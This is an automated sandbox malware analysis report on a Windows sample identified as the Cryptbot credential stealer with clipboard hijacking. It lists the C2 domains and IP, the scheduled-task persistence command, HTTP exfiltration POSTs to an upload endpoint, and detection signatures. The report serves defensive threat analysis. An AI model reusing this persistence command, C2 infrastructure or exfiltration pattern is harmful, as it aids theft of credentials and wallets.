Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1521603
MD5:	0603207308448ad82dc3d1fc17923ddb
SHA1:	9c4f8f3e35d6404e22b50b7f1a0641a1b4195d94
SHA256:	0fb82d8a8edd32ba4f80b129b228c9e74871f55f970b44c75af5aa4572b1b582
Tags:	exeuser-jstrosch
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0603207308448AD82DC3D1FC17923DDB)

service123.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 4D55689820C303548CBA9CFA9F2BF3CB)

schtasks.exe (PID: 7264 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 4620 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 4D55689820C303548CBA9CFA9F2BF3CB)

service123.exe (PID: 5836 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 4D55689820C303548CBA9CFA9F2BF3CB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["sevtvh17pt.top", "analforeverlovyu.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1899287053.000000000434C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7680	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7680	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7680	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 7180	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.service123.exe.6c9d0000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7680, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 7264, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T01:02:37.719946+0200	2054350	1	A Network Trojan was detected	192.168.2.10	49706	37.9.4.189	80	TCP
2024-09-29T01:02:41.186134+0200	2054350	1	A Network Trojan was detected	192.168.2.10	49708	37.9.4.189	80	TCP
2024-09-29T01:02:46.011222+0200	2054350	1	A Network Trojan was detected	192.168.2.10	49712	37.9.4.189	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: file.exe.7680.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["sevtvh17pt.top", "analforeverlovyu.top"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007915B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_007915B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9D14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_6C9D14B0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	5_2_007981E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C9F0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C9FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C9FA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C9FA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CAAF990h	5_2_6C9EEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6CA784A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9F4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C9FA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C9FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C9FA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C9FC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C9FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C9FE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	5_2_6CA70730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C9F0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	5_2_6CA2A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C9F0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6CAAD014h]	5_2_6CAA4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6CA47D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6CA43840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	5_2_6C9FD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6CA0BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6CA0BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6CA29B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6CA4B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C9FD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CAADFF4h	5_2_6CA43690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_6CA49600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	5_2_6C9FD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	5_2_6C9FD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9EB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6CA73140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9FD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6CA67350

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49706 -> 37.9.4.189:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49708 -> 37.9.4.189:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49712 -> 37.9.4.189:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sevtvh17pt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top

Source: Joe Sandbox View

ASN Name: SELECTELRU SELECTELRU

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary46956507User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: sevtvh17pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary25984815User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 76061Host: sevtvh17pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary86278020User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30040Host: sevtvh17pt.top

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: sevtvh17pt.top
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary46956507User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: sevtvh17pt.top

Source: file.exe, 00000000.00000003.1417427067.000000000171B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvh17pt.top/v1/upload.php
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: LYgbAXPoWKdcsgBzdWtH.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C9E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_6C9E9C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C9E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C9E9D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C9E9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_6C9E9E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\file.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007951B0	5_2_007951B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00793E20	5_2_00793E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA12CCE	5_2_6CA12CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9DCD00	5_2_6C9DCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9DEE50	5_2_6C9DEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9E0FC0	5_2_6C9E0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA20AC0	5_2_6CA20AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9E44F0	5_2_6C9E44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA146E0	5_2_6CA146E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA087C0	5_2_6CA087C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA107D0	5_2_6CA107D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA12090	5_2_6CA12090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA20060	5_2_6CA20060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA02360	5_2_6CA02360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA2DC70	5_2_6CA2DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9E5880	5_2_6C9E5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA098F0	5_2_6CA098F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA17A20	5_2_6CA17A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1DBEE	5_2_6CA1DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1140E	5_2_6CA1140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA21510	5_2_6CA21510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1F610	5_2_6CA1F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9FF760	5_2_6C9FF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9E70C0	5_2_6C9E70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA950D0	5_2_6CA950D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9D3000	5_2_6C9D3000

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAA36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAA3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA9ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAA5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAA3560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAA3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CAA5A70 appears 77 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@2/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\intjCOZYNY

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\UQUngpFpdOyYhxpyvlKC

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1458179523.0000000003988000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: lygbaxpowkdcsgbzdwth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
